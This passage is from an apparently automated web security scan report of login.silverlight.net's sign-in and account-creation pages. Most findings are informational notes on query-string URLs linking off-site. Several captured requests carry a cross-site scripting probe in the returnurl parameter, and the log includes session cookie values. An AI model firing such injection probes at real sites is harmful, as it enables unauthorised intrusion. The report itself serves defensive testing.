GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:35:36 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:25:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343536&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343536&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.138. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1p3w2555guyp4vyezvapkw2m; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:00:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:50:33 GMT
Content-Length: 9085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402633&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402633&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.139. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nmoxpluj5lbcig55wj1hbbaj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 15:58:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:48:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402515&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402515&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.140. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=' HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttps%25253A//login.silverlight.net/login/createuser.aspx%25253Freturnurl%25253D%252527%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:46:30 GMT
Content-Length: 8922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351991&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351991&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.141. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Content-Length: 9085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343045&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343045&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.142. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:01:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:51:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402694&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402694&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.143. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:51:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344494&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344494&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.144. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ffuubcjgr0yyrsy3luhto445; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:33:45 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343425&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343425&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.145. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4mfnu1i5bj2moy553ivmbd55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:34:58 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:24:58 GMT
Content-Length: 9085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343498&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343498&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.146. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=' HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttps%25253A//login.silverlight.net/login/createuser.aspx%25253Freturnurl%25253D%252527%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:33:31 GMT
Content-Length: 8922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351211&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351211&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.147. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mecq5h55fmxdoki32eayru55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 15:58:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:48:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402513&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402513&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402513&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.148. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; s_cc=true; s_sq=%5B%5BB%5D%5D; omniID=1296343609010_276c_8196_7f44_eaa48f639648

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 12:39:12 GMT
Content-Length: 12978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296391153&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
